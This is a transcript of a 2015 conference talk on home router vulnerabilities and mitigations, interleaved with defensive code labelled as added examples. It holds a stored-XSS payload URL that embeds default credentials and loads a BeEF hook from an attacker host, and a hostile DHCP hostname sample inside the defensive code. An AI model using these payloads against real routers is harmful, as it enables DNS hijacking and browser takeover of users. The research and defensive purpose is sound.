SOHO Routers: Swords and Shields (CyberCamp 2015)
TRANSCRIPT
SOHO Routers: Swords & Shields
Álvaro Folgado, José Antonio Rodríguez, Iván Sanz
About us
Meet our research group:
- Álvaro Folgado Rueda, Independent Researcher
- José Antonio Rodríguez García, Independent Researcher
- Iván Sanz de Castro, Security Analyst at Wise Security Global
The talk
- Mitigations
- Vulnerabilities & Attacks
- Keys
Real World Attacks, Example 1: Dictionary for DNS Hijacking via CSRF
Real World Attacks, Example 2: Phishing website
Real World Attacks, Example 3: Linux/Moose Malware
Common security problems: Services
- Too many, and mostly useless
  - Increases the attack surface
- Insecure
Common security problems: Default credentials
- Public and well-known for each model
- Not randomly generated
- Hardly ever modified by users
Pie chart of default user / password pairs: 1234 / 1234, admin / admin, [blank] / admin, admin / password, vodafone / vodafone. Slice labels as extracted: 45%, 27%, 5%, 5%, 18%.
Common security problems: Multiple user accounts
- Also with public default credentials
- Mostly useless for users
- Almost always hidden from end users
  - Passwords for these accounts are never changed
Swords
Bypass Authentication
- Allows unauthenticated attackers to carry out router configuration changes
- Locally and remotely
- Exploits:
  - Improper file permissions: web configuration interface
  - Service misconfiguration: SMB and Twonky Media Server
- Persistent DoS / restore the router to default settings without requiring authentication
- Exploiting the Twonky Media Server: Video Demos #1 & #2
Cross Site Request Forgery
- Change any router configuration setting by sending a specific malicious link to the victim
- Main goal: DNS hijacking
- Requires embedding login credentials in the malicious URL
  - Attack feasible if credentials have never been changed
  - Google Chrome does not pop up a warning
Cross Site Request Forgery: suspicious link, isn't it?
- URL shortening services
- Create a malicious website
Persistent Cross Site Scripting
- Inject malicious script code within the web configuration interface
- Goals: session hijacking, browser infection
Persistent Cross Site Scripting
- Browser Exploitation Framework (BeEF) is a great help
- Input field character length limitation: the BeEF hook links to a more complex script file hosted by the attacker
  `http://1234:[email protected]/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>`
Unauthenticated Cross Site Scripting
- Script code injection is performed locally without requiring any login process
- Send a DHCP Request PDU containing the malicious script within the hostname parameter
- The malicious script is injected within the Connected Clients (DHCP Leases) table
Unauthenticated Cross Site Scripting
Unauthenticated Cross Site Scripting: always try harder
Privilege Escalation
- A user without administrator rights is able to escalate privileges and become an administrator
- Shows why multiple user accounts are unsafe
- Privilege escalation via FTP: Video Demo #3
Backdoor
- Hidden administrator accounts
- Completely invisible to end users, but they allow attackers to change any configuration setting
Information Disclosure
- Obtain critical information without requiring any login process:
  - WLAN password
  - Detailed list of currently connected clients
  - Hints about the router's administrative password
  - Other critical configuration settings
Information Disclosure
Universal Plug and Play
- Enabled by default on several router models
- Allows applications to make network configuration changes such as opening ports
- Extremely insecure protocol
  - Lack of an authentication process
  - Awful implementations
- Main goals
  - Open critical ports for remote WAN hosts
  - Persistent Denial of Service
  - Carry out other configuration changes
Universal Plug and Play: locally
- Miranda UPnP tool
Universal Plug and Play: remotely
- Malicious SWF file
Attack vectors
- Locally: the attacker is connected to the victim's LAN, either with an Ethernet cable or wirelessly
- Remotely: the attacker is outside the victim's LAN
Social engineering is your friend
- For link-based remote attacks: XSS, CSRF and UPnP
- Social networks = build the easiest botnet ever!
- Phishing emails = targeted attacks
Live Demo #1: DNS Hijacking via CSRF
Live Demo #2: Unauthenticated Cross Site Scripting via DHCP Request
Live Demo #3: Reflected XSS + client-side attack to get a Reverse Shell
Live Demo #4: Bypass Authentication using SMB Symlinks
Live Demo #3: Details
- Using a Reflected Cross Site Scripting to get a Reverse Shell on the victim's computer
- Exploits an Internet Explorer client-side vulnerability: CVE-2012-1876
Shields
Mitigations: End users
Users start with a broken shield:
- Limited configuration settings
- Several attacks cannot be stopped
- Mitigations only work for specific models
- Not as easy as buying a brand new router
- No antivirus is going to protect you
Mitigations: End users: where to start?
- Identify your router model
- Look for the router credentials
- Get into the advanced configuration interface
Mitigations: End users: general recommendations
- Only log into the web interface when needed
  - Log out (if possible) / wipe the browser's cache after finishing
- Change your router's administrative password
Mitigations: End users: general recommendations
- Check your DNS servers on a weekly basis
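The weekly DNS check above can be scripted from the client side: a machine on the LAN compares the resolvers it actually received from the router against a list the owner trusts, which is how a DNS hijack via a CSRF'd router configuration (Example 1 and Live Demo #1) becomes visible. This is an added example, not code from the talk; the trusted addresses and the sample resolv.conf are constructed.

```python
"""Weekly DNS check for a home network (added example, not from the talk).

Reads the resolvers a client received from the router (resolv.conf format)
and flags any resolver that is not on an owner-maintained allowlist.
"""
import ipaddress
import re
import sys

# Resolvers the owner expects: the router's LAN address (it forwards upstream)
# and a public resolver that was configured on purpose. Constructed values.
TRUSTED_RESOLVERS = frozenset({"192.168.1.1", "9.9.9.9"})

# Constructed /etc/resolv.conf as a DHCP client might see it after a hijack:
# the second resolver is not one the owner configured.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search home.lan
nameserver 192.168.1.1
nameserver 198.51.100.23
"""

_NAMESERVER_RE = re.compile(r"^\s*nameserver\s+(\S+)", re.MULTILINE)


def parse_nameservers(resolv_conf: str) -> list:
    """Return the nameserver addresses in resolv_conf text, in listed order.
    Entries that are not valid IP addresses are dropped rather than trusted."""
    servers = []
    for match in _NAMESERVER_RE.finditer(resolv_conf):
        try:
            servers.append(str(ipaddress.ip_address(match.group(1))))
        except ValueError:
            continue
    return servers


def check_resolv_conf(resolv_conf: str, trusted=TRUSTED_RESOLVERS) -> dict:
    """Compare configured resolvers with the allowlist.
    Returns the configured list, the suspicious subset and an overall verdict."""
    configured = parse_nameservers(resolv_conf)
    suspicious = [s for s in configured if s not in trusted]
    return {
        "configured": configured,
        "suspicious": suspicious,
        # An empty resolver list is also worth a look: nothing to compare against.
        "ok": bool(configured) and not suspicious,
    }


def main(argv):
    # With a path argument the real file is checked; otherwise the sample is used.
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_RESOLV_CONF
    report = check_resolv_conf(text)
    print("configured resolvers:", ", ".join(report["configured"]) or "(none)")
    if report["ok"]:
        print("OK: all resolvers are on the trusted list")
        return 0
    print("WARNING: unexpected resolvers:", ", ".join(report["suspicious"]) or "(none listed)")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python dns_check.py /etc/resolv.conf` from a cron job; a non-zero exit means a resolver appeared that the owner never configured, and the router's DNS settings should be compared with the expected ones before anything else is trusted.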
Mitigations: End users: general recommendations
- Do not trust shortened links
- Be careful when browsing the web interface
Mitigations: End users: multiple user accounts
- Try to delete any other administrative account
- At least, change their passwords, if possible
Video Demo #4: Mitigating privilege escalation and account-related attacks
Mitigations: End users: services
- Disable any unused service if given the chance
  - FTP and SMB
  - Media servers: Twonky
  - UPnP
  - If there is a local risk, DHCP
- It does not always work…
Mitigations: End users: firmware
- Update to the latest version
  - The manufacturer might not have fixed any issues
- How?
Mitigations: End users: custom firmware images
- For advanced users
- More configuration settings
- Might have security flaws as well
Mitigations: Manufacturers
- Listen to what security researchers have to say
- Do not include useless services
  - Especially in ISP SOHO routers
  - At least, make it feasible to completely shut them down
- Critical ports closed to the WAN by default: at least 21, 22, 23, 80 and 8000/8080
Mitigations: Manufacturers
- Do not include multiple user accounts
- Design a safer alternative to UPnP
- Avoid using unsafe protocols (HTTP, Telnet, FTP) in favour of HTTPS, SSH, SFTP
- Randomly generate user credentials (diagram on the slide relates the admin password to: serial number, MAC address, manufacturing date)
Mitigations: Manufacturers: XSS
- Check every input field within the router's web interface
- Sanitize DHCP hostname parameters
- Content Security Policies
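The following is an added example of the two recommendations above applied to the Connected Clients (DHCP Leases) table, the sink used by the unauthenticated XSS via DHCP Request described earlier. It is not code from the talk or from any router firmware. It validates the DHCP hostname against the RFC 1123 label rules when the lease is recorded, HTML-escapes every cell when the table is rendered, and names a Content-Security-Policy header that blocks inline script even if both layers failed. The sample leases, including the hostile hostname, are constructed.

```python
"""Defensive handling of DHCP-supplied hostnames in a router web UI.

Added example, not firmware code. Three independent layers:
1. validate the hostname (RFC 1123 labels) when the lease is stored,
2. HTML-escape every cell when the leases table is rendered,
3. serve a Content-Security-Policy that forbids inline and third-party script.
"""
import html
import re

# One RFC 1123 label: letters, digits and hyphens, 1-63 chars, no leading or
# trailing hyphen. A full name is labels joined by dots, at most 253 chars.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """True only for a syntactically valid hostname; anything containing
    angle brackets, quotes, slashes or spaces fails by construction."""
    if not name or len(name) > 253:
        return False
    labels = name.rstrip(".").split(".")
    return all(_LABEL_RE.match(label) for label in labels)


def sanitize_hostname(raw: bytes) -> str:
    """Turn the DHCP option 12 (hostname) value into a name safe to store.
    Invalid or non-ASCII names become a neutral placeholder instead of being
    kept verbatim; the lease itself is still recorded."""
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        return "invalid-hostname"
    return name if is_valid_hostname(name) else "invalid-hostname"


def render_lease_row(hostname: str, ip: str, mac: str) -> str:
    """Render one table row. Every cell is escaped so that even a hostname
    that slipped past validation stays inside its text node."""
    cells = (html.escape(hostname), html.escape(ip), html.escape(mac))
    return "<tr>" + "".join(f"<td>{cell}</td>" for cell in cells) + "</tr>"


# Header the UI should send with every page: scripts only from the router's
# own origin, no inline script, no plugins, and no framing by other sites.
CSP_HEADER = (
    "Content-Security-Policy",
    "default-src 'self'; script-src 'self'; object-src 'none'; "
    "base-uri 'none'; frame-ancestors 'none'",
)

# Constructed sample leases as (raw hostname option, IP, MAC). The second
# entry is the kind of hostname a hostile DHCP client could send.
SAMPLE_LEASES = [
    (b"laptop-01", "192.168.1.10", "00:11:22:33:44:55"),
    (b'<script src="http://attacker.example/hook.js"></script>', "192.168.1.11", "66:77:88:99:aa:bb"),
    (b"printer.home.lan", "192.168.1.12", "cc:dd:ee:ff:00:11"),
]


def render_lease_table(leases=SAMPLE_LEASES) -> str:
    """Full table as the Connected Clients page would embed it."""
    rows = [render_lease_row(sanitize_hostname(h), ip, mac) for h, ip, mac in leases]
    return "<table>" + "".join(rows) + "</table>"


if __name__ == "__main__":
    print(f"{CSP_HEADER[0]}: {CSP_HEADER[1]}")
    print(render_lease_table())
```

The validation layer is the one the slide asks for; the escaping and CSP layers are there because a single filter on a single input field is exactly what the "always try harder" slide shows being bypassed.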
Mitigations: Manufacturers: CSRF
- Tokens… that work
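What "tokens that work" means in practice, as an added example that is not code from the talk or from any vendor firmware: a per-device random secret, a token bound to the logged-in session and to an issue time, constant-time comparison, a same-origin check, and the rule that configuration changes are only accepted over POST, so a crafted link (a GET, as in the DNS-hijacking CSRF above) can never apply them. ROUTER_ORIGIN, the session ids and the form field name `csrf_token` are constructed.

```python
"""Session-bound CSRF tokens for a router web interface (added example)."""
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"  # constructed: origin the UI is served from
TOKEN_TTL = 15 * 60                    # seconds a token stays valid


def new_server_secret() -> bytes:
    """Fresh random key generated on the device, not derived from serial or MAC."""
    return secrets.token_bytes(32)


def _mac(secret: bytes, session_id: str, ts: str) -> str:
    return hmac.new(secret, f"{session_id}|{ts}".encode(), hashlib.sha256).hexdigest()


def issue_token(secret: bytes, session_id: str, now=None) -> str:
    """Token = issue_time.HMAC(secret, session_id | issue_time), embedded in
    every configuration form. Binding to session_id makes a token captured
    from one browser session useless in another."""
    ts = str(int(time.time() if now is None else now))
    return f"{ts}.{_mac(secret, session_id, ts)}"


def token_is_valid(secret: bytes, session_id: str, token: str, now=None) -> bool:
    """Accept only a well-formed, unexpired token minted for this session."""
    try:
        ts, mac = token.split(".", 1)
        issued = int(ts)
    except (ValueError, AttributeError):
        return False
    current = int(time.time() if now is None else now)
    if not 0 <= current - issued <= TOKEN_TTL:
        return False
    # compare_digest does not leak how many leading characters matched.
    return hmac.compare_digest(_mac(secret, session_id, ts), mac)


def same_origin(header_value: str) -> bool:
    """Exact scheme://host[:port] match. A prefix test would also accept
    http://192.168.1.10, so the URL is parsed instead."""
    parts = urlsplit(header_value or "")
    return f"{parts.scheme}://{parts.netloc}" == ROUTER_ORIGIN


def authorize_config_change(secret, session_id, method, headers, form, now=None):
    """Gate in front of every state-changing handler (DNS servers, port
    forwarding, passwords, ...). Returns (allowed, reason)."""
    if method.upper() != "POST":
        return False, "configuration changes require POST"
    if not same_origin(headers.get("Origin") or headers.get("Referer", "")):
        return False, "request did not originate from the router UI"
    if not token_is_valid(secret, session_id, form.get("csrf_token", ""), now):
        return False, "missing, expired or foreign CSRF token"
    return True, "ok"


if __name__ == "__main__":
    secret = new_server_secret()
    token = issue_token(secret, "session-A")
    # A link a victim clicked: GET, no token, carries no session binding.
    print(authorize_config_change(secret, "session-A", "GET", {}, {"dns1": "198.51.100.23"}))
    # The router's own form, submitted by the logged-in user.
    print(authorize_config_change(secret, "session-A", "POST",
                                  {"Origin": ROUTER_ORIGIN}, {"csrf_token": token}))
```

The token alone would already defeat the "embed the credentials in a link" pattern, because the attacker cannot compute the HMAC without the device's secret; the POST and origin checks are the belt to that suspender and cost nothing on an embedded web server.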
Mitigations: Manufacturers: Bypass Authentication & Information Disclosure
- Check for improper file permissions and public debug messages
- Service-related: check for possible wrong service configuration (e.g. FTP, SMB)
Keys
Developed tools
Manufacturers' response
- On average, 2-3 emails sent to each manufacturer
- Most of them unreplied...
- 7 months later, number of vulnerabilities fixed: 0
Responsible Disclosure
Results
- More than 60 vulnerabilities discovered
- 22 router models affected
- 11 manufacturers affected
Bar chart: disclosed vulnerabilities per manufacturer. Manufacturers: Amper, Astoria, Belkin, Comtrend, D-Link, Huawei, Linksys, Netgear, Observa T., Sagemcom, Zyxel. Series: number of disclosed vulnerabilities (total vulnerabilities found) and number of affected routers; y-axis from 0 to 18.
Pie chart: vulnerabilities by type. Types: XSS, Unauthenticated XSS, CSRF, Denial of Service, Privilege Escalation, Information Disclosure, Backdoor, Bypass Authentication, UPnP. Slice labels as extracted: 21%, 15%, 20%, 8%, 2%, 3%, 2%, 6%, 23%.
Conclusion: has SOHO router security improved? Hell NO!
- Serious security problems
- Easy to exploit
- With huge impact
- Millions of users affected
PLEASE, START FIXING SOHO ROUTER SECURITY
Álvaro Folgado Rueda · [email protected]
José A. Rodríguez García · [email protected]
Iván Sanz de Castro · [email protected]
Thank you! Q&A time
https://cybercamp.es · @CyberCampEs · #CyberCamp15